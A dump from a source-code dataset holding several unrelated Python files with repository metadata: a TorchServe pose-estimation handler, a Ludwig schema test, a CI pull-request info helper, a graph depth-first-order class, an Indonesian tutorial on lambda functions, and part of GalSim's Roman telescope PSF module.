raise ImportError('Please install torchserve.')
class MMPoseHandler(BaseHandler):
def initialize(self, context):
properties = context.system_properties
self.map_location = 'cuda' if torch.cuda.is_available() else 'cpu'
        self.device = torch.device(
            self.map_location + ':' + str(properties.get('gpu_id'))
            if torch.cuda.is_available() else self.map_location)
self.manifest = context.manifest
model_dir = properties.get('model_dir')
serialized_file = self.manifest['model']['serializedFile']
checkpoint = os.path.join(model_dir, serialized_file)
self.config_file = os.path.join(model_dir, 'config.py')
self.model = init_pose_model(self.config_file, checkpoint, self.device)
self.initialized = True
def preprocess(self, data):
images = []
for row in data:
image = row.get('data') or row.get('body')
if isinstance(image, str):
image = base64.b64decode(image)
image = mmcv.imfrombytes(image)
images.append(image)
return images
def inference(self, data, *args, **kwargs):
if isinstance(self.model, TopDown):
results = self._inference_top_down_pose_model(data)
elif isinstance(self.model, (AssociativeEmbedding, )):
results = self._inference_bottom_up_pose_model(data)
else:
raise NotImplementedError(
f'Model type {type(self.model)} is not supported.')
return results
def _inference_top_down_pose_model(self, data):
results = []
for image in data:
# use dummy person bounding box
preds, _ = inference_top_down_pose_model(
self.model, image, person_results=None)
results.append(preds)
return results
def _inference_bottom_up_pose_model(self, data):
results = []
for image in data:
preds, _ = inference_bottom_up_pose_model(self.model, image)
results.append(preds)
return results
def postprocess(self, data):
output = [[{
'keypoints': pred['keypoints'].tolist()
} for pred in preds] for preds in data]
return output
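# A hedged invocation sketch once the handler is packaged and served with
# TorchServe (the model name "mmpose" and the image file are assumptions):
#
#   curl -X POST http://localhost:8080/predictions/mmpose -T human.jpg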
|
eb554b4e467db180878da36610dc28539e1ec8dd
|
7eb606a7957e5500f163c93dc4b19418cf9cf335
|
/tests/ludwig/marshmallow/test_fields_preprocessing.py
|
a340e3ad561d1fdec7fecf05fbf6df2eab03c1af
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
ludwig-ai/ludwig
|
024f74da86567a57ec8e30efcb4600f0c52333a1
|
e1d023e41606c9b76b35e1d231c2f13368a30eca
|
refs/heads/master
| 2023-09-03T08:07:32.978301
| 2023-09-01T19:39:32
| 2023-09-01T19:39:32
| 163,346,054
| 2,567
| 285
|
Apache-2.0
| 2023-09-14T20:34:52
| 2018-12-27T23:58:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,127
|
py
|
test_fields_preprocessing.py
|
#! /usr/bin/env python
from ludwig.schema.features.preprocessing.binary import BinaryPreprocessingConfig
from ludwig.schema.features.preprocessing.category import CategoryPreprocessingConfig
from ludwig.schema.features.preprocessing.utils import PreprocessingDataclassField
def get_marshmallow_from_dataclass_field(dfield):
"""Helper method for checking marshmallow metadata succinctly."""
return dfield.metadata["marshmallow_field"]
def test_preprocessing_dataclass_field():
binary_preproc_dataclass = PreprocessingDataclassField("binary")
assert binary_preproc_dataclass.default_factory is not None
assert get_marshmallow_from_dataclass_field(binary_preproc_dataclass).allow_none is False
assert binary_preproc_dataclass.default_factory() == BinaryPreprocessingConfig()
category_preproc_dataclass = PreprocessingDataclassField("category")
assert category_preproc_dataclass.default_factory is not None
assert get_marshmallow_from_dataclass_field(category_preproc_dataclass).allow_none is False
assert category_preproc_dataclass.default_factory() == CategoryPreprocessingConfig()
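# Runnable directly with pytest from the repository root (a sketch):
#   pytest tests/ludwig/marshmallow/test_fields_preprocessing.py -q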
|
b31c6e7b5791c64ff847aa5aa6dd85c3ef5a6bd4
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/olap/ByConity/tests/ci/pr_info.py
|
86b3081f98c075e4701b4e158b2458323782761e
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 12,503
|
py
|
pr_info.py
|
#!/usr/bin/env python3
import json
import logging
import os
from typing import Set
from unidiff import PatchSet # type: ignore
from build_download_helper import get_with_retries
from env_helper import (
GITHUB_REPOSITORY,
GITHUB_SERVER_URL,
GITHUB_RUN_URL,
GITHUB_EVENT_PATH,
)
FORCE_TESTS_LABEL = "force tests"
SKIP_SIMPLE_CHECK_LABEL = "skip simple check"
DIFF_IN_DOCUMENTATION_EXT = [
".html",
".md",
".yml",
".txt",
".css",
".js",
".xml",
".ico",
".conf",
".svg",
".png",
".jpg",
".py",
".sh",
".json",
]
RETRY_SLEEP = 0
def get_pr_for_commit(sha, ref):
if not ref:
return None
try_get_pr_url = (
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/commits/{sha}/pulls"
)
try:
response = get_with_retries(try_get_pr_url, sleep=RETRY_SLEEP)
data = response.json()
if len(data) > 1:
print("Got more than one pr for commit", sha)
for pr in data:
            # refs for pushes look like refs/heads/XX
            # refs for PRs look like XX
if pr["head"]["ref"] in ref:
return pr
print("Cannot find PR with required ref", ref, "returning first one")
first_pr = data[0]
return first_pr
except Exception as ex:
print("Cannot fetch PR info from commit", ex)
return None
class PRInfo:
default_event = {
"commits": 1,
"before": "HEAD~",
"after": "HEAD",
"ref": None,
}
def __init__(
self,
github_event=None,
need_orgs=False,
need_changed_files=False,
pr_event_from_api=False,
):
if not github_event:
if GITHUB_EVENT_PATH:
with open(GITHUB_EVENT_PATH, "r", encoding="utf-8") as event_file:
github_event = json.load(event_file)
else:
github_event = PRInfo.default_event.copy()
self.event = github_event
self.changed_files = set() # type: Set[str]
self.body = ""
self.diff_urls = []
self.release_pr = ""
        ref = github_event.get("ref", "refs/heads/master")
if ref and ref.startswith("refs/heads/"):
ref = ref[11:]
# workflow completed event, used for PRs only
if "action" in github_event and github_event["action"] == "completed":
self.sha = github_event["workflow_run"]["head_sha"]
prs_for_sha = get_with_retries(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/commits/{self.sha}"
"/pulls",
sleep=RETRY_SLEEP,
).json()
if len(prs_for_sha) != 0:
github_event["pull_request"] = prs_for_sha[0]
if "pull_request" in github_event: # pull request and other similar events
self.number = github_event["pull_request"]["number"]
if pr_event_from_api:
try:
response = get_with_retries(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}"
f"/pulls/{self.number}",
sleep=RETRY_SLEEP,
)
github_event["pull_request"] = response.json()
except Exception as e:
logging.warning(
"Unable to get pull request event %s from API, "
"fallback to received event. Exception: %s",
self.number,
e,
)
if "after" in github_event:
self.sha = github_event["after"]
else:
self.sha = github_event["pull_request"]["head"]["sha"]
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.repo_full_name = GITHUB_REPOSITORY
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.pr_html_url = f"{repo_prefix}/pull/{self.number}"
self.base_ref = github_event["pull_request"]["base"]["ref"]
self.base_name = github_event["pull_request"]["base"]["repo"]["full_name"]
self.head_ref = github_event["pull_request"]["head"]["ref"]
self.head_name = github_event["pull_request"]["head"]["repo"]["full_name"]
self.body = github_event["pull_request"]["body"]
self.labels = {
label["name"] for label in github_event["pull_request"]["labels"]
}
self.user_login = github_event["pull_request"]["user"]["login"]
self.user_orgs = set([])
if need_orgs:
user_orgs_response = get_with_retries(
github_event["pull_request"]["user"]["organizations_url"],
sleep=RETRY_SLEEP,
)
if user_orgs_response.ok:
response_json = user_orgs_response.json()
self.user_orgs = set(org["id"] for org in response_json)
self.diff_urls.append(github_event["pull_request"]["diff_url"])
elif "commits" in github_event:
self.sha = github_event["after"]
pull_request = get_pr_for_commit(self.sha, github_event["ref"])
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.repo_full_name = GITHUB_REPOSITORY
if pull_request is None or pull_request["state"] == "closed":
# it's merged PR to master
self.number = 0
self.labels = {}
self.pr_html_url = f"{repo_prefix}/commits/{ref}"
self.base_ref = ref
self.base_name = self.repo_full_name
self.head_ref = ref
self.head_name = self.repo_full_name
self.diff_urls.append(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/"
f"compare/{github_event['before']}...{self.sha}"
)
else:
self.number = pull_request["number"]
self.labels = {label["name"] for label in pull_request["labels"]}
self.base_ref = pull_request["base"]["ref"]
self.base_name = pull_request["base"]["repo"]["full_name"]
self.head_ref = pull_request["head"]["ref"]
self.head_name = pull_request["head"]["repo"]["full_name"]
self.pr_html_url = pull_request["html_url"]
if "pr-backport" in self.labels:
# head1...head2 gives changes in head2 since merge base
                    # That's why we need {self.head_ref}...master to get
# files changed in upstream AND master...{self.head_ref}
# to get files, changed in current HEAD
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/master...{self.head_ref}.diff"
)
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/{self.head_ref}...master.diff"
)
# Get release PR number.
self.release_pr = get_pr_for_commit(self.base_ref, self.base_ref)[
"number"
]
else:
self.diff_urls.append(pull_request["diff_url"])
if "release" in self.labels:
# For release PRs we must get not only files changed in the PR
# itself, but as well files changed since we branched out
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/{self.head_ref}...master.diff"
)
else:
print("event.json does not match pull_request or push:")
print(json.dumps(github_event, sort_keys=True, indent=4))
self.sha = os.getenv("GITHUB_SHA")
self.number = 0
self.labels = {}
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.repo_full_name = GITHUB_REPOSITORY
self.pr_html_url = f"{repo_prefix}/commits/{ref}"
self.base_ref = ref
self.base_name = self.repo_full_name
self.head_ref = ref
self.head_name = self.repo_full_name
if need_changed_files:
self.fetch_changed_files()
def fetch_changed_files(self):
if not getattr(self, "diff_urls", False):
raise TypeError("The event does not have diff URLs")
for diff_url in self.diff_urls:
response = get_with_retries(
diff_url,
sleep=RETRY_SLEEP,
)
response.raise_for_status()
if "commits" in self.event and self.number == 0:
diff = response.json()
if "files" in diff:
self.changed_files = {f["filename"] for f in diff["files"]}
else:
diff_object = PatchSet(response.text)
self.changed_files.update({f.path for f in diff_object})
print(f"Fetched info about {len(self.changed_files)} changed files")
def get_dict(self):
return {
"sha": self.sha,
"number": self.number,
"labels": self.labels,
"user_login": self.user_login,
"user_orgs": self.user_orgs,
}
def has_changes_in_documentation(self):
# If the list wasn't built yet the best we can do is to
# assume that there were changes.
if self.changed_files is None or not self.changed_files:
return True
for f in self.changed_files:
_, ext = os.path.splitext(f)
path_in_docs = "docs" in f
path_in_website = "website" in f
if (
ext in DIFF_IN_DOCUMENTATION_EXT and (path_in_docs or path_in_website)
) or "docker/docs" in f:
return True
return False
def has_changes_in_submodules(self):
if self.changed_files is None or not self.changed_files:
return True
for f in self.changed_files:
if "contrib/" in f:
return True
return False
def can_skip_builds_and_use_version_from_master(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if (
not f.startswith("tests/queries")
or not f.startswith("tests/integration")
or not f.startswith("tests/performance")
):
return False
return True
def can_skip_integration_tests(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if not f.startswith("tests/queries") or not f.startswith(
"tests/performance"
):
return False
return True
def can_skip_functional_tests(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if not f.startswith("tests/integration") or not f.startswith(
"tests/performance"
):
return False
return True
class FakePRInfo:
def __init__(self):
self.number = 11111
self.sha = "xxxxxxxxxxxxxxxxxx"
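# Hedged usage sketch (not part of the original file): inside a CI check this is
# typically driven as
#   pr_info = PRInfo(need_changed_files=True)
#   if pr_info.has_changes_in_documentation():
#       ...  # schedule the docs build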
|
2db1c353b764feeba9c3cd045192fcc9bed8875b
|
d854a0e93db79fad31dcc6fe61bfd26f3a5b9990
|
/algs4/depth_first_order.py
|
06cc5609d676ad6673322765b7245a61c2c541d1
|
[
"MIT"
] |
permissive
|
shellfly/algs4-py
|
334a8b7bd040db03859076e18a8aba98bfabc501
|
09bbd0c9e8cc82210df905e7d3c315265914e143
|
refs/heads/master
| 2022-10-05T05:38:10.386032
| 2022-09-26T05:10:10
| 2022-09-26T05:10:10
| 114,614,712
| 290
| 77
|
MIT
| 2022-09-26T06:23:15
| 2017-12-18T08:23:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,878
|
py
|
depth_first_order.py
|
"""
* Execution: python depth_first_order.py digraph.txt
* Data files: https://algs4.cs.princeton.edu/42digraph/tinyDAG.txt
* https://algs4.cs.princeton.edu/42digraph/tinyDG.txt
*
* Compute preorder and postorder for a digraph or edge-weighted digraph.
* Runs in O(E + V) time.
*
* % python depth_first_order.py tinyDAG.txt
* v pre post
* --------------
* 0 0 8
* 1 3 2
* 2 9 10
* 3 10 9
* 4 2 0
* 5 1 1
* 6 4 7
* 7 11 11
* 8 12 12
* 9 5 6
* 10 8 5
* 11 6 4
* 12 7 3
* Preorder: 0 5 4 1 6 9 11 12 10 2 3 7 8
* Postorder: 4 5 1 12 11 10 9 6 0 3 2 7 8
* Reverse postorder: 8 7 2 3 0 6 9 10 11 12 1 5 4
*
"""
from algs4.queue import Queue
from algs4.stack import Stack
from algs4.digraph import Digraph
class DepthFirstOrder:
def __init__(self, G):
self.marked = [False for _ in range(G.V)]
self.pre = Queue()
self.post = Queue()
for w in range(G.V):
if not self.marked[w]:
self.dfs(G, w)
def dfs(self, G, v):
self.pre.enqueue(v)
self.marked[v] = True
for w in G.adj[v]:
if not self.marked[w]:
self.dfs(G, w)
self.post.enqueue(v)
def reverse_post(self):
reverse = Stack()
for v in self.post:
reverse.push(v)
return reverse
if __name__ == '__main__':
import sys
g = Digraph(file=open(sys.argv[1]))
dfs = DepthFirstOrder(g)
print("Preorder: ")
for v in dfs.pre:
print(v, " ", end="")
print()
print("Postorder: ")
for v in dfs.post:
print(v, " ", end="")
print()
print("ReversePostorder: ")
for v in dfs.reverse_post():
print(v, " ", end="")
print()
|
b3a436556bac2b664734968c44e271bbe4667189
|
2883819589b815a96e992cf184a28a9cbafc19d5
|
/Episode 52 - Anonymous atau lambda function/main_app.py
|
4c5bcef6c792092d178ad193195839e034e8eff9
|
[] |
no_license
|
kelasterbuka/Python3.x_Dasar_Programming
|
f944cbfdd990b50ffdb5c0abf68033d5256b5cad
|
0fd9299817ab5804d16d7981707d589b36a962e1
|
refs/heads/master
| 2023-01-08T21:13:39.395752
| 2022-11-02T07:46:40
| 2022-11-02T07:46:40
| 123,400,518
| 453
| 361
| null | 2023-02-02T11:48:48
| 2018-03-01T07:44:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
main_app.py
|
# Lambda function
def f_kuadrat(angka):
return angka**2
print(f"hasil fungsi kuadrat = {f_kuadrat(3)}")
# let's try the same thing with a lambda
# output = lambda argument: expression
kuadrat = lambda angka : angka**2
print(f"hasil lambda kuadrat = {kuadrat(5)}")
pangkat = lambda num,pow : num**pow
print(f"hasil lambda pangkat = {pangkat(4,2)}")
## so what is this actually useful for?
# sorting a regular list
data_list = ["Otong","Ucup","Dudung"]
data_list.sort()
print(f"sorted list = {data_list}")
# sorting by name length
def panjang_nama(nama):
return len(nama)
data_list.sort(key=panjang_nama)
print(f"sorted list by panjang = {data_list}")
# sort using a lambda
data_list = ["Otong","Ucup","Dudung"]
data_list.sort(key=lambda nama:len(nama))
print(f"sorted list by lambda = {data_list}")
# filter
data_angka = [1,2,3,4,5,6,7,8,9,10,11,12]
def kurang_dari_lima(angka):
return angka < 5
data_angka_baru = list(filter(kurang_dari_lima,data_angka))
data_angka_baru = list(filter(lambda x:x<7,data_angka))
print(data_angka_baru)
# even-numbers case
data_genap = list(filter(lambda x:(x%2==0),data_angka))
print(data_genap)
# odd-numbers case
data_ganjil = list(filter(lambda x:(x%2!=0),data_angka))
print(data_ganjil)
# multiples of 3
data_3 = list(filter(lambda x:(x%3==0),data_angka))
print(data_3)
# anonymous function
# currying <- Haskell Curry
def pangkat(angka,n):
hasil = angka**n
return hasil
data_hasil = pangkat(5,2)
print(f"fungsi biasa = {data_hasil}")
# with currying this becomes
def pangkat(n):
return lambda angka:angka**n
pangkat2 = pangkat(2)
print(f"pangkat2 = {pangkat2(5)}")
pangkat3 = pangkat(3)
print(f"pangkat3 = {pangkat3(3)}")
print(f"pangkat bebas = {pangkat(4)(5)}")
|
84e4a17eb33ae97eb4a95edeeed553ec162c5357
|
0010b3d8b8f806d6065e1bb1aa3c18f9714001a7
|
/galsim/roman/roman_psfs.py
|
aea1b67c62b2a6f452dbb0d8181e2a97d18abfdc
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
GalSim-developers/GalSim
|
bfd2d5e57f20874ad81bc735195c5c62efad63eb
|
f1c0319600cc713373f1cea7459171fbf388848e
|
refs/heads/main
| 2023-08-17T07:30:44.583679
| 2023-08-15T02:52:00
| 2023-08-15T02:52:00
| 3,510,804
| 194
| 104
|
NOASSERTION
| 2023-09-12T04:03:38
| 2012-02-22T02:51:45
|
Python
|
UTF-8
|
Python
| false
| false
| 22,669
|
py
|
roman_psfs.py
|
# Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
import numpy as np
import os
from ..utilities import LRU_Cache
"""
@file roman_psfs.py
Part of the Roman Space Telescope module. This file includes routines needed to define a realistic
PSF for Roman.
"""
# Define a default set of bandpasses for which this routine works.
default_bandpass_list = ['J129', 'F184', 'W149', 'Y106', 'Z087', 'H158']
# Prefix for files containing information about Zernikes for each SCA for cycle 7.
zemax_filepref = "Roman_Phase-A_SRR_WFC_Zernike_and_Field_Data_170727"
zemax_filesuff = '.txt'
zemax_wavelength = 1293. #nm
# These need 'SCA*' prepended to the start to get the file name, and they live in
# the share/roman directory.
pupil_plane_file_longwave = '_full_mask.fits.gz'
pupil_plane_file_shortwave = '_rim_mask.fits.gz'
def getPSF(SCA, bandpass,
SCA_pos=None, pupil_bin=4, wcs=None,
n_waves=None, extra_aberrations=None,
wavelength=None, gsparams=None,
logger=None, high_accuracy=None, approximate_struts=None):
"""Get a single PSF for Roman ST observations.
The user must provide the SCA and bandpass; the latter is used when setting up the pupil
plane configuration and when interpolating chromatic information, if requested.
This routine carries out linear interpolation of the aberrations within a given SCA, based on
the Roman (then WFIRST) Cycle 7 specification of the aberrations as a function of focal plane
position, more specifically from ``Roman_Phase-A_SRR_WFC_Zernike_and_Field_Data_170727.xlsm``
downloaded from https://roman.gsfc.nasa.gov/science/Roman_Reference_Information.html. Phase
B updates that became available in mid-2019 have not yet been incorporated into this module.
(Note: the files at that url still use the old WFIRST name. We have renamed them to use the
new name of the telescope, Roman, after downloading.)
The mask images for the Roman pupil plane are available at the Roman Reference Information
page: https://roman.gsfc.nasa.gov/science/Roman_Reference_Information.html.
There are separate files for each SCA, since the view of the spider pattern varies somewhat
across the field of view of the wide field camera. Furthermore, the effect of the obscuration
is somewhat different at longer wavelengths, so F184 has a different set of files than the
    other filters. cf. the ``galsim.roman.longwave_bands`` and ``galsim.roman.shortwave_bands``
attributes, which define which bands use which pupil plane images. Users usually don't need
to worry about any of this, as GalSim will select the correct pupil image automatically based
on the SCA and bandpass provided.
The full pupil plane images are 4096 x 4096, which use a lot of memory and are somewhat slow
to use, so we normally bin them by a factor of 4 (resulting in 1024 x 1024 images). This
provides enough detail for most purposes and is much faster to render than using the full pupil
plane images. This bin factor is a settable parameter, called ``pupil_bin``. If you want the
more accurate, slower calculation using the full images, you can set it to 1. In the other
direction, using pupil_bin=8 (resulting in a 512 x 512 image) still provides fairly reasonable
results and is even faster to render. It is not generally recommended to use higher binning
than that, as the diffraction spikes will become noticeably degraded.
.. note::
This function will cache the aperture calculation, so repeated calls with the same
SCA and bandpass should be much faster after the first call, as the pupil plane will
already be loaded. If you need to clear the cache for memory reasons, you may call::
galsim.roman.roman_psfs._make_aperture.clear()
to recover any memory currently being used for this cache. Of course, subsequent calls to
`getPSF` will need to rebuild the aperture at that point.
The PSF that is returned by default will be oriented with respect to the SCA coordinates,
not world coordinates as is typical in GalSim. The pupil plane has a fixed orientation
with respect to the focal plane, so the PSF rotates with the telescope. To obtain a
PSF in world coordinates, which can be convolved with galaxies (that are normally described
in world coordinates), you may pass in a ``wcs`` parameter to this function. This will
project the PSF into world coordinates according to that WCS before returning it. Otherwise,
    the return value is equivalent to using ``wcs=galsim.PixelScale(galsim.roman.pixel_scale)``.
The calculation takes advantage of the fact that the diffraction limit and aberrations have a
simple, understood wavelength-dependence. (The Roman project webpage for Cycle 7 does in fact
provide aberrations as a function of wavelength, but the deviation from the expected chromatic
dependence is sub-percent so we neglect it here.) For reference, the script used to parse the
Zernikes given on the webpage and create the files in the GalSim repository can be found in
``devel/external/parse_roman_zernikes_1217.py``. The resulting chromatic object can be used to
draw into any of the Roman bandpasses, though the pupil plane configuration will only be
correct for those bands in the same range (i.e., long- or short-wavelength bands).
For applications that require very high accuracy in the modeling of the PSF, with very limited
aliasing, you may want to lower the folding_threshold in the gsparams. Otherwise very bright
stars will show some reflections in the spider pattern and possibly some boxiness at the
outskirts of the PSF. Using ``gsparams = GSParams(folding_threshold=2.e-3)`` generally
provides good results even for very bright (e.g. mag=10) stars. In these cases, you probably
also want to reduce ``pupil_bin`` somewhat from the default value of 4.
By default, no additional aberrations are included above the basic design. However, users can
provide an optional keyword ``extra_aberrations`` that will be included on top of those that are
part of the design. This should be in the same format as for the ChromaticOpticalPSF class,
with units of waves at the fiducial wavelength, 1293 nm. Currently, only aberrations up to order
22 (Noll convention) are simulated. For Roman, the tolerance for additional
aberrations was a total of 90 nanometers RMS as of mid-2015, distributed largely among coma,
astigmatism, trefoil, and spherical aberrations (NOT defocus). This information might serve as
a guide for reasonable ``extra_aberrations`` inputs. The reference for that number is
an earlier Cycle 5 document:
http://roman.gsfc.nasa.gov/science/sdt_public/wps/references/instrument/README_AFTA_C5_WFC_Zernike_and_Field_Data.pdf
However, the default (non-extra) aberrations are from Cycle 7 material linked earlier in this
docstring.
Jitter and charge diffusion are, by default, not included. Users who wish to include these can
find some guidelines for typical length scales of the Gaussians that can represent these
effects, and convolve the ChromaticOpticalPSF with appropriate achromatic Gaussians.
The PSFs are always defined assuming the user will specify length scales in arcsec.
Users may find they do not have to call `getPSF` for all objects in their simulations; for a
given SCA and position within the SCA, and a given pupil plane configuration and wavelength
information, it should be possible to reuse the PSFs.
Parameters:
SCA: Single value specifying the SCA for which the PSF should be
loaded.
bandpass: Single string specifying the bandpass to use when defining the
pupil plane configuration and/or interpolation of chromatic PSFs.
You may also pass a string 'long' or 'short' for this argument, in
which case, the correct pupil plane configuration will be used for
long- or short-wavelength bands (F184 is long, all else is short).
In this case, no interpolation can be used, since it is defined
using the extent of the chosen bandpass. If ``wavelength`` is given,
then bandpass may be None, which will use the short-wavelength pupil
plane image.
SCA_pos: Single galsim.PositionD indicating the position within the SCA
for which the PSF should be created. If None, the exact center of
the SCA is chosen. [default: None]
pupil_bin: The binning to apply to the pupil plane image. (See discussion above.)
[default: 4]
wcs: The WCS to use to project the PSF into world coordinates.
[default: galsim.PixelScale(galsim.roman.pixel_scale)]
n_waves: Number of wavelengths to use for setting up interpolation of the
chromatic PSF objects, which can lead to much faster image
rendering. If None, then no interpolation is used. Note that
users who want to interpolate can always set up the interpolation
later on even if they do not do so when calling `getPSF`.
[default: None]
extra_aberrations: Array of extra aberrations to include in the PSF model, on top of
those that are part of the Roman design. These should be
provided in units of waves at the fiducial wavelength of 1293 nm,
as an array of length 23 with entries 4 through 22 corresponding
to defocus through the 22nd Zernike in the Noll convention.
[default: None]
wavelength: An option to get an achromatic PSF for a single wavelength, for
users who do not care about chromaticity of the PSF. If None,
then the fully chromatic PSF is returned. Alternatively the user
should supply either (a) a wavelength in nanometers, and they
will get achromatic OpticalPSF objects for that wavelength, or
(b) a bandpass object, in which case they will get achromatic
OpticalPSF objects defined at the effective wavelength of that
                            bandpass. [default: None]
gsparams: An optional GSParams argument. See the docstring for GSParams
for details. [default: None]
Returns:
A single PSF object (either a ChromaticOpticalPSF or an OpticalPSF depending on the
inputs).
"""
from ..position import PositionD
from ..errors import GalSimValueError, GalSimRangeError
from ..bandpass import Bandpass
from ..wcs import PixelScale
from . import n_pix, n_sca, longwave_bands, shortwave_bands, pixel_scale, pixel_scale_mm
# Deprecated options
if high_accuracy:
if approximate_struts:
from ..deprecated import depr
from ..gsparams import GSParams
depr('high_accuracy=True,approximate_struts=True', 2.3,
'pupil_bin=4, gsparams=galsim.GSParams(folding_threshold=2.e-3)',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
# Set folding_threshold 2.5x smaller than default.
gsparams = GSParams.check(gsparams, folding_threshold=2.e-3)
pupil_bin = 4
else:
from ..deprecated import depr
from ..gsparams import GSParams
depr('high_accuracy=True', 2.3,
'pupil_bin=1, gsparams=galsim.GSParams(folding_threshold=2.e-3)',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
# Set folding_threshold 2.5x smaller than default.
gsparams = GSParams.check(gsparams, folding_threshold=2.e-3)
pupil_bin = 1
elif approximate_struts:
from ..deprecated import depr
from ..gsparams import GSParams
depr('approximate_struts=True', 2.3, 'pupil_bin=8',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
pupil_bin = 8
elif approximate_struts is False or high_accuracy is False:
# If they are explicitly given, rather than default (None), then trigger this.
from ..deprecated import depr
from ..gsparams import GSParams
depr('approximate_struts=False, high_accuracy=False', 2.3, 'pupil_bin=4',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
pupil_bin = 4
if SCA <= 0 or SCA > n_sca:
raise GalSimRangeError("Invalid SCA.", SCA, 1, n_sca)
# SCA_pos: if None, then all should just be center of the SCA.
if SCA_pos is None:
SCA_pos = PositionD(n_pix/2, n_pix/2)
# Parse the bandpasses to see which pupil plane image is needed
pupil_plane_type = None
if bandpass in longwave_bands or bandpass=='long':
pupil_plane_type = 'long'
elif bandpass in shortwave_bands or bandpass=='short':
pupil_plane_type = 'short'
elif bandpass is None and n_waves is None:
pupil_plane_type = 'short'
else:
raise GalSimValueError("Bandpass not a valid Roman bandpass or 'short'/'long'.",
bandpass, default_bandpass_list)
# If bandpass is 'short'/'long', then make sure that interpolation is not called for, since that
# requires an actual bandpass.
if bandpass in ['short','long'] and n_waves is not None:
raise GalSimValueError("Cannot use bandpass='short'/'long' with interpolation.", bandpass)
if not isinstance(wavelength, (Bandpass, float, type(None))):
raise TypeError("wavelength should either be a Bandpass, float, or None.")
# Now call _get_single_PSF().
psf = _get_single_PSF(SCA, bandpass, SCA_pos, pupil_bin,
n_waves, extra_aberrations, wavelength,
pupil_plane_type, gsparams)
# Apply WCS.
# The current version is in arcsec units, but oriented parallel to the image coordinates.
# So to apply the right WCS, project to pixels using the Roman mean pixel_scale, then
# project back to world coordinates with the provided wcs.
if wcs is not None:
scale = PixelScale(pixel_scale)
psf = wcs.toWorld(scale.toImage(psf), image_pos=SCA_pos)
return psf
def __make_aperture(SCA, pupil_plane_type, pupil_bin, wave, gsparams):
from . import diameter, obscuration
from .. import fits
from .. import meta_data
from ..phase_psf import Aperture
# Load the pupil plane image.
if pupil_plane_type == 'long':
pupil_plane_im = os.path.join(meta_data.share_dir, 'roman',
'SCA%d'%SCA + pupil_plane_file_longwave)
else:
pupil_plane_im = os.path.join(meta_data.share_dir, 'roman',
'SCA%d'%SCA + pupil_plane_file_shortwave)
pupil_plane_im = fits.read(pupil_plane_im, read_header=True)
# Native pixel scale in the file is for the exit pupil. We want the scale of the
# entrance pupil. Fortunately, they provide the conversion as PUPILMAG in the header.
# They also use microns for units, and we want meters, hence the extra 1.e-6.
pupil_plane_im.scale *= pupil_plane_im.header['PUPILMAG'] * 1.e-6
pupil_plane_im = pupil_plane_im.bin(pupil_bin,pupil_bin)
aper = Aperture(lam=wave, diam=diameter,
obscuration=obscuration,
pupil_plane_im=pupil_plane_im,
gsparams=gsparams)
return aper
# Usually a given run will only need one or a few different apertures for repeated getPSF calls.
# So cache those apertures here to avoid having to remake them.
_make_aperture = LRU_Cache(__make_aperture)
def _get_single_PSF(SCA, bandpass, SCA_pos, pupil_bin,
n_waves, extra_aberrations, wavelength,
pupil_plane_type, gsparams):
"""Routine for making a single PSF. This gets called by `getPSF` after it parses all the
options that were passed in. Users will not directly interact with this routine.
"""
from .. import OpticalPSF, ChromaticOpticalPSF
from . import diameter
from ..bandpass import Bandpass
from .roman_bandpass import getBandpasses
if wavelength is None:
